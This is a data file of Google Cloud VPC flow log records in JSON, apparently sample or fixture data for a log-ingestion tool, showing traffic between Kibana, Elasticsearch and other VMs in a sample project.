+{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"67.43.156.13","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"67.43.156.13","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"67.43.156.13","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proje
ct","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"75801985
4043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"67.43.156.13","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"67.43.156.13","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-projec
